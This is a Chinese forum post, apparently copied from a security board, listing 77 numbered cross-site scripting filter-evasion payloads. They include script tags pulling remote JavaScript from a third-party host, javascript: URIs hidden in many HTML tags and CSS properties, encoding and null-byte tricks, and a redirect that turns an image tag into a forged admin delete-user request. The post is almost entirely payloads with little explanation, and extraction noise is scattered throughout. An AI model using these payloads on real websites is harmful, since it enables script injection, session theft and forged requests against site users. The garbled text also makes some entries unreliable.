貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。% [$ H9 C# g) d0 g
(1)普通的XSS JavaScript注入" g/ A5 }: d9 H# i: t! I; x3 E- D" F
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ F- `7 \. ]3 P, d8 @
(2)IMG标签XSS使用JavaScript命令! s+ V2 P# J( _# U0 [% X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 }& ^$ d* Y" w7 W' Z8 Z2 K(3)IMG标签无分号无引号
& S! m0 q9 Z3 H4 ]" X<IMG SRC=javascript:alert(‘XSS’)>; F+ l& M* F# E N0 f
(4)IMG标签大小写不敏感
+ Z9 {, r% i) C2 Y& h$ w5 [* W<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, Z, R- {8 r$ I9 }- I! D
(5)HTML编码(必须有分号)9 e( r% ^" S) v' y
<IMG SRC=javascript:alert(“XSS”)>
I8 X4 _8 t# U7 z(6)修正缺陷IMG标签
* ^1 V) H- ^" B; i) ~<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! ^1 A0 g7 g2 J# x5 _! {9 H& ]! r/ q) }9 \
- U& J4 m( B- [3 x( i(7)formCharCode标签(计算器)
1 T7 @) o4 Z6 r3 B0 m% I3 S<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 X- P- C; A9 J! `) R8 d(8)UTF-8的Unicode编码(计算器)
# w, r" b. ^8 V% c# Y, H& C+ X' g: R<IMG SRC=jav..省略..S')>
( s" X9 W. W" \) V(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 k5 l- ^, e" Z/ `! e: J3 e
<IMG SRC=jav..省略..S')>, {7 u' |9 |3 {5 M! \
(10)十六进制编码也是没有分号(计算器) w# n! Q$ A- K; x
<IMG SRC=java..省略..XSS')>
# d* q- L j: J2 K(11)嵌入式标签,将Javascript分开
% w8 M C- I( u \8 `: H& x2 s<IMG SRC=”jav ascript:alert(‘XSS’);”>, H1 m: j' }1 g7 g
(12)嵌入式编码标签,将Javascript分开/ D" {. r; P( r! F$ h& f6 p& f4 w! |# Z
<IMG SRC=”jav ascript:alert(‘XSS’);”> U+ d% ?1 v! \
(13)嵌入式换行符
D. T5 x( U8 }; z! c! w* `5 j, ~4 V& y<IMG SRC=”jav ascript:alert(‘XSS’);”>6 l9 s- f/ t5 {+ }$ x: Q
(14)嵌入式回车6 S6 f' I [8 I" r) r4 U# D/ v
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 B( s2 t1 U |/ R# f(15)嵌入式多行注入JavaScript,这是XSS极端的例子& N# r9 G0 R& p5 Z
<IMG SRC=”javascript:alert(‘XSS‘)”>+ B3 S3 C/ D$ K* U6 |8 y9 I
(16)解决限制字符(要求同页面)- D; K$ e. p# T1 g
<script>z=’document.’</script>
! f/ M, K! x. v<script>z=z+’write(“‘</script>1 z z! U* N+ s* c
<script>z=z+’<script’</script>
, }4 Y; v7 E$ O: e* e& J<script>z=z+’ src=ht’</script>/ U7 U( o5 E v! ~- E
<script>z=z+’tp://ww’</script>
1 h2 m: A+ r; v+ t5 y+ c8 x<script>z=z+’w.shell’</script>
1 M+ S+ k3 L" _6 w) T( d, I<script>z=z+’.net/1.’</script>
4 H7 p" U: m3 }; D<script>z=z+’js></sc’</script>
- ~ h: K" d& p5 Y R9 T<script>z=z+’ript>”)’</script>
7 e! |+ }" t; t D+ {<script>eval_r(z)</script>& ?7 ?8 y. I$ @. ^, F7 _
(17)空字符12-7-1 T00LS - Powered by Discuz! Board( E+ w9 J' O" V, {" [ Y
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
. l# b) `8 u: T5 V9 k, aperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' O" k6 B( A0 i(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用9 B# `- z0 l- O7 Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
5 ^+ f, W$ @1 Y4 r6 F/ A(19)Spaces和meta前的IMG标签# t; K0 k y, L
<IMG SRC=” javascript:alert(‘XSS’);”>
* L- n- A' V% T! O( }( y(20)Non-alpha-non-digit XSS
# z2 _) p7 g+ r: C! a7 C9 V<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>& q% I, l4 d% d4 _& g7 B* k, Z
(21)Non-alpha-non-digit XSS to 2! Z9 _ l9 }4 p9 F, Y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ ~; d9 s4 T" k5 j+ A# r' M5 X% v' d
(22)Non-alpha-non-digit XSS to 3
8 K5 S: D( h1 w( {# a<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# g8 h" a& J4 L2 a$ q(23)双开括号: o. |, y: Y0 w2 P$ {
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
5 d4 l0 [. g; P# f" u4 m# U) ^(24)无结束脚本标记(仅火狐等浏览器)5 m, v" O% l9 D# ]0 Y; U$ x8 o
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
7 U9 I, z3 f5 _3 J" ?7 O: W+ H$ Z(25)无结束脚本标记2
& h5 I; a0 J: O# e# P8 L: Q<SCRIPT SRC=//3w.org/XSS/xss.js>% L) ~/ O: c, c) O! u, f k
(26)半开的HTML/JavaScript XSS
! U) S4 o0 Q+ k+ T<IMG SRC=”javascript:alert(‘XSS’)”
% c/ }$ k1 J7 v(27)双开角括号" t5 q* D: ~4 b, i; @0 M9 C
<iframe src=http://3w.org/XSS.html <5 @% P5 P( _- z* G9 V% Q3 K4 l
(28)无单引号 双引号 分号$ z$ D v H% \1 B
<SCRIPT>a=/XSS/" x7 Y* J; o* }1 p
alert(a.source)</SCRIPT> U" c& Z- Z3 W; E7 |) U
(29)换码过滤的JavaScript# p; h4 B6 r( x5 r% J* \
\”;alert(‘XSS’);//
. n8 q- \: Y A% S3 O' Y- |& o3 d(30)结束Title标签
$ b/ a( ?/ N) Z* g5 X</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 c1 \/ P% M1 E) W8 [
(31)Input Image7 L2 ~" ?9 _: w& t
<INPUT SRC=”javascript:alert(‘XSS’);”>
W( Q! W- ^6 m9 z3 s* [/ k(32)BODY Image( ^$ G/ z) M# p; x: J! A
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 l( o$ L: \" C; K' m
(33)BODY标签2 m$ r$ ]) k. k8 n P: D2 J$ B
<BODY(‘XSS’)>% E1 T4 O$ B: t9 l1 ], U- E1 n
(34)IMG Dynsrc
* @0 m! i1 p; A, k0 u6 b) @<IMG DYNSRC=”javascript:alert(‘XSS’)”>7 G: }! d6 C' i) S# b( g5 U
(35)IMG Lowsrc
2 P; a7 s3 [, V' [<IMG LOWSRC=”javascript:alert(‘XSS’)”>4 K( @# F L+ M
(36)BGSOUND& u% E7 V1 {7 J7 x
<BGSOUND SRC=”javascript:alert(‘XSS’);”>$ n4 ^# Z& @/ y! B- n# X2 a
(37)STYLE sheet
+ z9 ?3 B# s/ k5 P* Y<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 D5 i J+ U' m- o0 [* ]: D
(38)远程样式表$ a0 \; Q0 ]5 m6 X; ]. p
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
4 G* k' S( O! O' K: t(39)List-style-image(列表式)! t v5 Y8 e6 D# J
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS+ x, D- ` D! }/ ]1 c
(40)IMG VBscript
6 T3 u5 C0 p; r; q, a% q/ p<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
8 f, F* z$ ` |8 O2 x- c+ g(41)META链接url7 p1 n# C5 O3 [
3 W8 _4 X* W% R( J
7 ~6 S' d% t4 V6 {( m0 o7 _<META HTTP-EQUIV=”refresh” CONTENT=”0;
: B7 J" N" A: vURL=http://;URL=javascript:alert(‘XSS’);”>6 p/ G Q& t, B" W% q
(42)Iframe; q \9 p' F2 K/ e( \7 l, v' `
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>3 D! N6 L2 e9 R' b! a! U
(43)Frame
5 b! ^/ _: V, L( Y9 ]<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
/ m- \5 l$ P* R1 shttps://www.t00ls.net/viewthread ... table&tid=15267 3/6 P4 _( m3 x3 }" o5 K
(44)Table3 i( |0 y; {' Q! R9 a @% a
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 g/ h0 W/ n; ?1 ]9 I
(45)TD
, i9 m) e" h* K5 i<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! l7 H! l2 i% M(46)DIV background-image5 e O+ X8 l& n2 a2 g. o
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ r- l; @3 I6 K# r- |; y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
1 E0 u3 R' y1 c5 l4 \8 C( h1 N, h8&13&12288&65279)
w3 H) V* l/ ^2 n* R<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 C$ Z* i5 c/ ^8 @% o
(48)DIV expression
* ^8 l8 [5 d4 l2 f% v' t u<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 M7 A# `: s( K$ z' m2 F* {
(49)STYLE属性分拆表达
6 G7 h7 \* V. Z+ y5 b: _: C9 E<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ d$ Z" l0 j: I& P: F" T+ Y
(50)匿名STYLE(组成:开角号和一个字母开头)
/ o2 z2 t% ]3 m' K) F2 p<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
5 W, L( }5 P! u- z3 c- n% e5 y% i(51)STYLE background-image7 |9 I1 k& z; N. `2 d
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A8 i0 }3 R/ p1 E- f7 t6 h
CLASS=XSS></A>" e4 b# @3 h% b1 B9 H$ Z
(52)IMG STYLE方式* D3 C" E, q9 W. @! Q" q8 {
exppression(alert(“XSS”))’>6 t3 d' I) d7 w3 Z( F" ]1 b- Y) o
(53)STYLE background( T5 q4 w9 ~- R" O4 N+ U6 }
<STYLE><STYLE1 _3 k) X v- u. P0 O& O; D
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- m' c4 }( U' ?9 g L- |
(54)BASE$ Z6 y& ^, [8 ?! `9 ^( S" Y
<BASE HREF=”javascript:alert(‘XSS’);//”>
+ ]5 r5 |+ Y9 `% ]7 k3 |* J6 {(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" X m' g$ c8 v<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: ?, ?* c% g; G5 Q _6 d1 n
(56)在flash中使用ActionScrpt可以混进你XSS的代码9 z* p: A% Q2 q# }& e
a=”get”;
1 J2 j+ I; } w2 C. |) Ub=”URL(\”";
, o9 u2 k7 D$ I* ]c=”javascript:”;# c' F; U0 r% y; w; X
d=”alert(‘XSS’);\”)”;
) V& ?- S% P" Z, ~eval_r(a+b+c+d);
2 M# j& l9 r8 Y+ F8 d(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 Z( V8 E- P$ C$ ^
<HTML xmlns:xss>. ~$ g2 ?4 J; \: K: C# f& Z! z
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>3 N. `/ t5 |) ~9 U& }2 u' ]/ c
<xss:xss>XSS</xss:xss>
4 C0 {/ ]0 {6 o: }0 I! m4 o# N</HTML>2 t, [2 b' `7 |! E& ]
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
/ Z: X% r2 m2 }4 t }# \$ d<SCRIPT SRC=””></SCRIPT>
& }+ h! s* K: J: Z9 B(59)IMG嵌入式命令,可执行任意命令) V/ O: ?$ k8 a) b' P" h8 V
<IMG SRC=”http://www.XXX.com/a.php?a=b”>% [8 i: D6 m3 h* d' j+ M! Z
(60)IMG嵌入式命令(a.jpg在同服务器)$ a# R# w: I% I& A" f9 I
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser* ?7 ^; _5 O; B
(61)绕符号过滤
/ s" P& J) X; L<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 I* U7 I( d0 d3 D3 a% r4 h
(62). [0 i2 ^, T% w2 X1 b* ]
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 Z/ w$ V9 L; G- v(63)
9 N _* K8 L+ P: z6 x; A6 j<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>( ^5 a I& w, x+ j; x
(64) O% {( }5 j. a
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>9 i( @6 ^* \& ]& c+ l4 Y( S
(65)
( W$ M$ Y1 o3 ~5 V<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
) Y% ]# b" P7 l; _1 H. d+ K(66)12-7-1 T00LS - Powered by Discuz! Board
( H) p+ ^/ @( i% q$ I$ G. c1 A6 chttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
) _! u0 |; ]* s, O6 P<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 D9 ]% v3 U2 W) V
(67)$ ~, V L4 R+ }8 ~% K* Y- [
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>. ?1 O" S6 q! u! _- }4 H
</SCRIPT>6 s% S9 n, R( C, ]
(68)URL绕行
0 V" \' g/ z" X( ]# D<A HREF=”http://127.0.0.1/”>XSS</A>
+ H d2 W7 j* r$ H. x7 N(69)URL编码
, \3 z9 q" ^$ Y# R* d$ ~; q; E' x<A HREF=”http://3w.org”>XSS</A># E* P8 a! j: ^9 I( k+ t% R
(70)IP十进制
+ Q8 j* ~7 Z( R) X+ H5 ]$ ~) [4 P1 m<A HREF=”http://3232235521″>XSS</A>1 {: ?# C% F7 y
(71)IP十六进制
1 L- ]5 _! C @0 ~<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
& f2 |" w7 _6 h(72)IP八进制
( j+ n9 t; Z& ~- `<A HREF=”http://0300.0250.0000.0001″>XSS</A>& g/ D& C9 H2 w; v0 l5 X% i
(73)混合编码- M, C$ c0 d7 W! L+ d/ X
<A HREF=”h
' X) c2 i( T; O3 Ftt p://6 6.000146.0×7.147/”">XSS</A>3 Y% ~) l3 U Y
(74)节省[http:]
, E- k& C+ r3 z$ F4 |. W<A HREF=”//www.google.com/”>XSS</A>$ _0 z/ q/ `/ B$ n: R4 l
(75)节省[www]" Y, J. J V$ M h$ d' _- N5 [
<A HREF=”http://google.com/”>XSS</A>2 S+ @. S7 H/ O, }) V
(76)绝对点绝对DNS/ \$ L. i) V. w2 M, X3 {# n
<A HREF=”http://www.google.com./”>XSS</A>
) W( _3 N+ e5 @& a& c5 S(77)javascript链接
! \! g# X$ {6 m6 i<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>7 b0 [% s; j: F, F- ^+ n4 x- o
* |4 i3 O: z. Q原文地址:http://fuzzexp.org/u/0day/?p=14
3 z; m# o7 G; I" i" a U" ^$ Z
. O8 v p$ v, G% A6 w |
发表于 2013-4-19 19:22:37
收藏
支持
反对